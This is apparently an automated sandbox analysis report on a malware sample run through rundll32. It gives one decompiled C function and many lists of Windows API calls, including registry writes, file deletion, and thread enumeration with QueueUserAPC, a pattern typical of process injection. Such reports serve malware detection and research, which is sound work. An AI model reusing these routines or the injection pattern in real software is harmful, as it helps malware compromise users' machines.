                                                          • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                                          • String ID:
                                                          • API String ID: 1430934453-0
                                                          • Opcode ID: 231ddbb614cca0fedc545b639d98daa04c530ed4fb18030d20d95de8d42fb6f7
                                                          • Instruction ID: f60f525f88f31b6a684f161748ddb1730016f463f1a12b589bd9d7cf684ad75d
                                                          • Opcode Fuzzy Hash: 231ddbb614cca0fedc545b639d98daa04c530ed4fb18030d20d95de8d42fb6f7
                                                          • Instruction Fuzzy Hash: DC517F7191130AFFDB51EFA4EC48EAE77BAEF88301B044459EE04A7190E7309A01DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 55%
                                                          			E036D62F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				intOrPtr _v16;
                                                          				char _v20;
                                                          				WCHAR* _v24;
                                                          				signed int _v28;
                                                          				intOrPtr _v32;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				WCHAR* _t58;
                                                          				signed int _t60;
                                                          				signed int _t62;
                                                          				intOrPtr _t64;
                                                          				intOrPtr _t66;
                                                          				intOrPtr _t70;
                                                          				void* _t72;
                                                          				void* _t75;
                                                          				void* _t76;
                                                          				WCHAR* _t80;
                                                          				WCHAR* _t83;
                                                          				void* _t84;
                                                          				void* _t85;
                                                          				void* _t86;
                                                          				intOrPtr _t92;
                                                          				signed int _t103;
                                                          				void* _t104;
                                                          				intOrPtr _t105;
                                                          				void* _t107;
                                                          				intOrPtr* _t115;
                                                          				void* _t119;
                                                          				WCHAR* _t125;
                                                          
                                                          				_t58 =  *0x36da3dc; // 0x5969c18
                                                          				_v24 = _t58;
                                                          				_v28 = 8;
                                                          				_v20 = GetTickCount();
                                                          				_t60 = E036D7367();
                                                          				_t103 = 5;
                                                          				_t98 = _t60 % _t103 + 6;
                                                          				_t62 = E036D7367();
                                                          				_t117 = _t62 % _t103 + 6;
                                                          				_v32 = _t62 % _t103 + 6;
                                                          				_t64 = E036D117A(_t60 % _t103 + 6);
                                                          				_v16 = _t64;
                                                          				if(_t64 != 0) {
                                                          					_t66 = E036D117A(_t117);
                                                          					_v12 = _t66;
                                                          					if(_t66 != 0) {
                                                          						_push(5);
                                                          						_t104 = 0xa;
                                                          						_t119 = E036D67E7(_t104,  &_v20);
                                                          						if(_t119 == 0) {
                                                          							_t119 = 0x36d918c;
                                                          						}
                                                          						_t70 = E036D659E(_v24);
                                                          						_v8 = _t70;
                                                          						if(_t70 != 0) {
                                                          							_t115 = __imp__;
                                                          							_t72 =  *_t115(_t119);
                                                          							_t75 =  *_t115(_v8);
                                                          							_t76 =  *_t115(_a4);
                                                          							_t80 = E036D6D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                                                          							_v24 = _t80;
                                                          							if(_t80 != 0) {
                                                          								_t105 =  *0x36da348; // 0x228d5a8
                                                          								_t28 = _t105 + 0x36dbb30; // 0x530025
                                                          								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                                                          								_push(4);
                                                          								_t107 = 5;
                                                          								_t83 = E036D67E7(_t107,  &_v20);
                                                          								_a8 = _t83;
                                                          								if(_t83 == 0) {
                                                          									_a8 = 0x36d9190;
                                                          								}
                                                          								_t84 =  *_t115(_a8);
                                                          								_t85 =  *_t115(_v8);
                                                          								_t86 =  *_t115(_a4);
                                                          								_t125 = E036D6D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                                                          								if(_t125 == 0) {
                                                          									E036D6C2C(_v24);
                                                          								} else {
                                                          									_t92 =  *0x36da348; // 0x228d5a8
                                                          									_t44 = _t92 + 0x36dbca8; // 0x73006d
                                                          									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                                                          									 *_a16 = _v24;
                                                          									_v28 = _v28 & 0x00000000;
                                                          									 *_a20 = _t125;
                                                          								}
                                                          							}
                                                          							E036D6C2C(_v8);
                                                          						}
                                                          						E036D6C2C(_v12);
                                                          					}
                                                          					E036D6C2C(_v16);
                                                          				}
                                                          				return _v28;
                                                          			}

                                                          0x036d62fc
                                                          0x036d6304
                                                          0x036d6307
                                                          0x036d6314
                                                          0x036d6317
                                                          0x036d631e
                                                          0x036d6325
                                                          0x036d6328
                                                          0x036d6335
                                                          0x036d6338
                                                          0x036d633b
                                                          0x036d6340
                                                          0x036d6345
                                                          0x036d634d
                                                          0x036d6352
                                                          0x036d6357
                                                          0x036d635d
                                                          0x036d6361
                                                          0x036d636a
                                                          0x036d636e
                                                          0x036d6370
                                                          0x036d6370
                                                          0x036d6378
                                                          0x036d637d
                                                          0x036d6382
                                                          0x036d6388
                                                          0x036d638f
                                                          0x036d63a0
                                                          0x036d63a7
                                                          0x036d63b9
                                                          0x036d63be
                                                          0x036d63c3
                                                          0x036d63cc
                                                          0x036d63de
                                                          0x036d63f4
                                                          0x036d63f9
                                                          0x036d63fd
                                                          0x036d6401
                                                          0x036d6406
                                                          0x036d640b
                                                          0x036d640d
                                                          0x036d640d
                                                          0x036d6417
                                                          0x036d6420
                                                          0x036d6427
                                                          0x036d6443
                                                          0x036d6447
                                                          0x036d6480
                                                          0x036d6449
                                                          0x036d644c
                                                          0x036d6454
                                                          0x036d6465
                                                          0x036d646d
                                                          0x036d6475
                                                          0x036d6479
                                                          0x036d6479
                                                          0x036d6447
                                                          0x036d6488
                                                          0x036d6488
                                                          0x036d6490
                                                          0x036d6490
                                                          0x036d6498
                                                          0x036d6498
                                                          0x036d64a4

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 036D630E
                                                          • lstrlen.KERNEL32(00000000,00000005), ref: 036D638F
                                                          • lstrlen.KERNEL32(?), ref: 036D63A0
                                                          • lstrlen.KERNEL32(00000000), ref: 036D63A7
                                                          • lstrlenW.KERNEL32(80000002), ref: 036D63AE
                                                          • wsprintfW.USER32 ref: 036D63F4
                                                          • lstrlen.KERNEL32(?,00000004), ref: 036D6417
                                                          • lstrlen.KERNEL32(?), ref: 036D6420
                                                          • lstrlen.KERNEL32(?), ref: 036D6427
                                                          • lstrlenW.KERNEL32(?), ref: 036D642E
                                                          • wsprintfW.USER32 ref: 036D6465
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 822878831-0
                                                          • Opcode ID: cef969b8fff6dba5308e606be0c30bac902b53a12348e6945d58dcd4168ad666
                                                          • Instruction ID: e2eff15d565545a055c75ae377c9752622801945e7caf15523e13fbce2aef5f1
                                                          • Opcode Fuzzy Hash: cef969b8fff6dba5308e606be0c30bac902b53a12348e6945d58dcd4168ad666
                                                          • Instruction Fuzzy Hash: 88517E76D00219ABCF11EFA4DC44ADE7FB5EF48314F058069E904AB250DB35CA25DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 06285389
                                                          • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0628539E
                                                          • RegCreateKeyA.ADVAPI32(80000001,?), ref: 062853C6
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06285407
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06285417
                                                          • RtlAllocateHeap.NTDLL(00000000,0627DA9D), ref: 0628542A
                                                          • RtlAllocateHeap.NTDLL(00000000,0627DA9D), ref: 06285439
                                                          • HeapFree.KERNEL32(00000000,00000000,?,0627DA9D,00000000,?,?,?), ref: 06285483
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0627DA9D,00000000,?,?,?,?), ref: 062854A7
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0627DA9D,00000000,?,?,?), ref: 062854CC
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0627DA9D,00000000,?,?,?), ref: 062854E1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$Allocate$CloseCreate
                                                          • String ID:
                                                          • API String ID: 4126010716-0
                                                          • Opcode ID: 0be35be34caf38aee336e92a6969e3b091cd7f1042d4d2381923a493684f4396
                                                          • Instruction ID: eaaecec2a1998a064306e34dd659ad69aaa658ffc674428d7cbef2db65c30445
                                                          • Opcode Fuzzy Hash: 0be35be34caf38aee336e92a6969e3b091cd7f1042d4d2381923a493684f4396
                                                          • Instruction Fuzzy Hash: AE51E275D1120AEFDF419F94EC889EEBBBAFF48355F10446AEA04B2120D3355A94DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 0627CEDD
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 0627CEF3
                                                          • lstrlenW.KERNEL32(00000000), ref: 0627CF36
                                                          • RtlAllocateHeap.NTDLL(00000000,0629350B), ref: 0627CF4C
                                                          • memcpy.NTDLL(00000000,00000000,06293509), ref: 0627CF5F
                                                          • _wcsupr.NTDLL ref: 0627CF6B
                                                          • lstrlenW.KERNEL32(?,06293509), ref: 0627CFA4
                                                          • RtlAllocateHeap.NTDLL(00000000,?,06293509), ref: 0627CFB9
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0627CFCF
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 0627CFF5
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627D004
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                                          • String ID:
                                                          • API String ID: 3868788785-0
                                                          • Opcode ID: 8890c84c3d51aeadb69ac1b6f81065fd8207b9e8a1f3b38294950155a7795891
                                                          • Instruction ID: d3b7e383bba0d035fc44d6858a928eeae2ff11f16ce9d5895b57e81225a2581b
                                                          • Opcode Fuzzy Hash: 8890c84c3d51aeadb69ac1b6f81065fd8207b9e8a1f3b38294950155a7795891
                                                          • Instruction Fuzzy Hash: C431C232B20315AFC7615E74AC8CE2F7BAAEF89761B14051AFE15E2140DB3198458FA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0627163E
                                                            • Part of subcall function 0628447B: RegCloseKey.ADVAPI32(?,?), ref: 06284502
                                                          • lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,00000000,?), ref: 0627166D
                                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,00000000,?), ref: 0627167E
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 062716B8
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?), ref: 062716DA
                                                          • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 062716E3
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 062716F9
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 0627170E
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 06271722
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 06271737
                                                          • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 06271740
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                                          • String ID:
                                                          • API String ID: 534682438-0
                                                          • Opcode ID: 5e97b073d2ddcec5f770be1bac556fcb3cea054366b7946a69f72626bf30231d
                                                          • Instruction ID: 85b7cf88c918c8ff2f5dd0311a4acfd63986552a4a51edba1b5171923c8bbdc2
                                                          • Opcode Fuzzy Hash: 5e97b073d2ddcec5f770be1bac556fcb3cea054366b7946a69f72626bf30231d
                                                          • Instruction Fuzzy Hash: 63313C71A10205FFCB129FA8EC8DD9E7BBAFF89341B184115FA05E6010E3319A55DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 062833E4
                                                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,06280B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0627C1F8,00000000,00000094), ref: 062833F6
                                                          • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,06280B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0627C1F8,00000000,00000094), ref: 06283403
                                                          • wsprintfA.USER32 ref: 0628341E
                                                          • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,0627C1F8,00000000,00000094,00000000), ref: 06283434
                                                          • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 0628344D
                                                          • WriteFile.KERNEL32(00000000,00000000), ref: 06283455
                                                          • GetLastError.KERNEL32 ref: 06283463
                                                          • CloseHandle.KERNEL32(00000000), ref: 0628346C
                                                          • GetLastError.KERNEL32(?,00000000,?,06280B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0627C1F8,00000000,00000094,00000000), ref: 0628347D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,06280B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0627C1F8,00000000,00000094), ref: 0628348D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                                          • String ID:
                                                          • API String ID: 3873609385-0
                                                          • Opcode ID: 4a5ef6066cf12e1e901700133bdbc0c3dc46e85fa74109b4c261242844d02a80
                                                          • Instruction ID: 5ce73cf4347cd155c23e5801360bfe5631806bc11543d04d50522e8d6fa8403b
                                                          • Opcode Fuzzy Hash: 4a5ef6066cf12e1e901700133bdbc0c3dc46e85fa74109b4c261242844d02a80
                                                          • Instruction Fuzzy Hash: DB11A5716523587FE3127B65BC8CF7B3B9DEBCA669B040124FE06E2180DA510C49CAB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrChrA.SHLWAPI(00000000,0000002C,765BD3B0,00000000,76C85520,76CDF710), ref: 06278030
                                                          • StrChrA.SHLWAPI(00000001,0000002C), ref: 06278043
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 06278066
                                                          • StrTrimA.SHLWAPI(00000001,?), ref: 06278075
                                                          • lstrlen.KERNEL32(00000000), ref: 062780AA
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 062780BD
                                                          • lstrcpy.KERNEL32(00000004,00000000), ref: 062780DB
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 062780FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                                          • String ID: W
                                                          • API String ID: 1974185407-655174618
                                                          • Opcode ID: 30996ace02609b089d8b3ca2c7214c09d1fae9262533f27766ea6ba57655180a
                                                          • Instruction ID: 53f26ae656fa2bd170d26bcc1729a8e3d74a09c9ed94cf030120594f8f627faa
                                                          • Opcode Fuzzy Hash: 30996ace02609b089d8b3ca2c7214c09d1fae9262533f27766ea6ba57655180a
                                                          • Instruction Fuzzy Hash: FC31AF31920319FFDF519F68DC4CE9A7BB9EF88740F14802AFA1897600D6789940CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(0689C1E8,00000000,00000000,00000000,?), ref: 06283CBA
                                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 06283CC9
                                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 06283CD6
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 06283CEE
                                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 06283CFA
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06283D16
                                                          • wsprintfA.USER32 ref: 06283DF8
                                                          • memcpy.NTDLL(00000000,00004000,?), ref: 06283E45
                                                          • InterlockedExchange.KERNEL32(0629A128,00000000), ref: 06283E63
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06283EA4
                                                            • Part of subcall function 0628E3CD: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0628E3F6
                                                            • Part of subcall function 0628E3CD: memcpy.NTDLL(00000000,?,?), ref: 0628E409
                                                            • Part of subcall function 0628E3CD: RtlEnterCriticalSection.NTDLL(0629A428), ref: 0628E41A
                                                            • Part of subcall function 0628E3CD: RtlLeaveCriticalSection.NTDLL(0629A428), ref: 0628E42F
                                                            • Part of subcall function 0628E3CD: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0628E467
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                                          • String ID:
                                                          • API String ID: 4198405257-0
                                                          • Opcode ID: 4935230cddf2f052ec19957558926eccc61307e0c142ae9ca1903fc2c8ded6f7
                                                          • Instruction ID: 9da59b7b4613965473738e124cb2f3102c48d0767bb32d37c4d8ddab991c0adf
                                                          • Opcode Fuzzy Hash: 4935230cddf2f052ec19957558926eccc61307e0c142ae9ca1903fc2c8ded6f7
                                                          • Instruction Fuzzy Hash: 5C616B71A1120AEFCF50DFA5EC88E9A7BAAFF88704F044429ED1597250D7749A54CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,06279100,?), ref: 06288D13
                                                          • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D1D
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D46
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D54
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D62
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D70
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D7E
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288D8C
                                                          • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 06288DB6
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,06279100,?), ref: 06288E37
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load$Library$AllocDll@4FreeHeapImports
                                                          • String ID:
                                                          • API String ID: 1792504554-0
                                                          • Opcode ID: aca6acb66a82f6ad7a38677ced27a3cdba08840c8270ded52eefce656ed13967
                                                          • Instruction ID: 6fecfa621932c17632b0c37d4a3358ecb8515064aadfbffc15c830e3d3f042ee
                                                          • Opcode Fuzzy Hash: aca6acb66a82f6ad7a38677ced27a3cdba08840c8270ded52eefce656ed13967
                                                          • Instruction Fuzzy Hash: 8B418E71E11319AFCB40EFA8EC88D9AB7FDFB89204B544466EA05DB240D738A944CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06272F91: memset.NTDLL ref: 06272FB3
                                                            • Part of subcall function 06272F91: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0627305D
                                                          • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0628E903
                                                          • CloseHandle.KERNEL32(?), ref: 0628E90F
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 0628E91F
                                                          • lstrlenW.KERNEL32(00000000), ref: 0628E928
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0628E939
                                                          • wcstombs.NTDLL ref: 0628E948
                                                          • lstrlen.KERNEL32(?), ref: 0628E955
                                                          • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 0628E994
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628E9A7
                                                          • DeleteFileW.KERNEL32(?), ref: 0628E9B4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                                          • String ID:
                                                          • API String ID: 2256351002-0
                                                          • Opcode ID: ae6089b3e84138973655d8e158a893c5e218c41d7fbd86f159bea807088769d5
                                                          • Instruction ID: 1bd6a7485c892397a795c482e066f48b5ab0476ed4a425b94d1894b4e182da7b
                                                          • Opcode Fuzzy Hash: ae6089b3e84138973655d8e158a893c5e218c41d7fbd86f159bea807088769d5
                                                          • Instruction Fuzzy Hash: 82319C31A11209EFDB62AFA5EC4CE9F3BBAEF88304F004024FE41A2190DB719914DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 0628B9F9
                                                          • CreateFileW.KERNEL32(06280971,80000000,00000003,0629A1E8,00000003,00000000,00000000,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA16
                                                          • GetLastError.KERNEL32(?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BABE
                                                            • Part of subcall function 0629087A: lstrlen.KERNEL32(?,00000000,0628BA3E,00000027,0629A1E8,?,00000000,?,?,0628BA3E,?,00000001,?,06280971,00000000,?), ref: 062908B0
                                                            • Part of subcall function 0629087A: lstrcpy.KERNEL32(00000000,00000000), ref: 062908D4
                                                            • Part of subcall function 0629087A: lstrcat.KERNEL32(00000000,00000000), ref: 062908DC
                                                          • GetFileSize.KERNEL32(06280971,00000000,?,00000001,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA49
                                                          • CreateFileMappingA.KERNEL32(06280971,0629A1E8,00000002,00000000,00000000,06280971), ref: 0628BA5D
                                                          • lstrlen.KERNEL32(06280971,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA79
                                                          • lstrcpy.KERNEL32(?,06280971), ref: 0628BA89
                                                          • GetLastError.KERNEL32(?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BA91
                                                          • HeapFree.KERNEL32(00000000,06280971,?,06280971,00000000,?,0627C1F8,00000000), ref: 0628BAA4
                                                          • CloseHandle.KERNEL32(06280971,?,00000001,?,06280971), ref: 0628BAB6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                                          • String ID:
                                                          • API String ID: 194907169-0
                                                          • Opcode ID: 26f22743f33efad8b2b4d2e29da0da91b46d530088242ec3be4ee752612c1bd7
                                                          • Instruction ID: 8eade95f043c8dedd8155cf5f4b5a5007b205a6da7c39e4e5d0392972d9257ed
                                                          • Opcode Fuzzy Hash: 26f22743f33efad8b2b4d2e29da0da91b46d530088242ec3be4ee752612c1bd7
                                                          • Instruction Fuzzy Hash: F5210A71901308FFDB119FA4EC49A9D7FB9FB48355F108469FA15A6250D3708A54DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0627EE2A
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0627EE36
                                                          • GetModuleHandleA.KERNEL32(?,0689978E,00000000,?,00000000), ref: 0627EE56
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0627EE5D
                                                          • Thread32First.KERNEL32(?,0000001C), ref: 0627EE6D
                                                          • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 0627EE88
                                                          • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 0627EE99
                                                          • CloseHandle.KERNEL32(00000000), ref: 0627EEA0
                                                          • Thread32Next.KERNEL32(?,0000001C), ref: 0627EEA9
                                                          • CloseHandle.KERNEL32(?), ref: 0627EEB5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                                          • String ID:
                                                          • API String ID: 2341152533-0
                                                          • Opcode ID: 463f1faa87218ce4b7d039275d12722162acb950e0d5a434fd244b9b9e82b8a0
                                                          • Instruction ID: 66e82fcd07a79fd9423879ed8c1b4b2bfd959b8882fa0c9a36dfba22b2dd1372
                                                          • Opcode Fuzzy Hash: 463f1faa87218ce4b7d039275d12722162acb950e0d5a434fd244b9b9e82b8a0
                                                          • Instruction Fuzzy Hash: 83216D72A1020DBFDF41AFA4EC88CEE7BB9FB89355B004529FA11A6190D7709955CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetEvent.KERNEL32(00000000,?,0628507B), ref: 0627DC56
                                                            • Part of subcall function 06285D52: InterlockedExchange.KERNEL32(?,000000FF), ref: 06285D59
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0628507B), ref: 0627DC76
                                                          • CloseHandle.KERNEL32(00000000,?,0628507B), ref: 0627DC7F
                                                          • CloseHandle.KERNEL32(00000000,?,?,0628507B), ref: 0627DC89
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0627DC91
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0627DCA9
                                                          • Sleep.KERNEL32(000001F4), ref: 0627DCB8
                                                          • CloseHandle.KERNEL32(00000000), ref: 0627DCC5
                                                          • LocalFree.KERNEL32(?), ref: 0627DCD0
                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 0627DCDA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
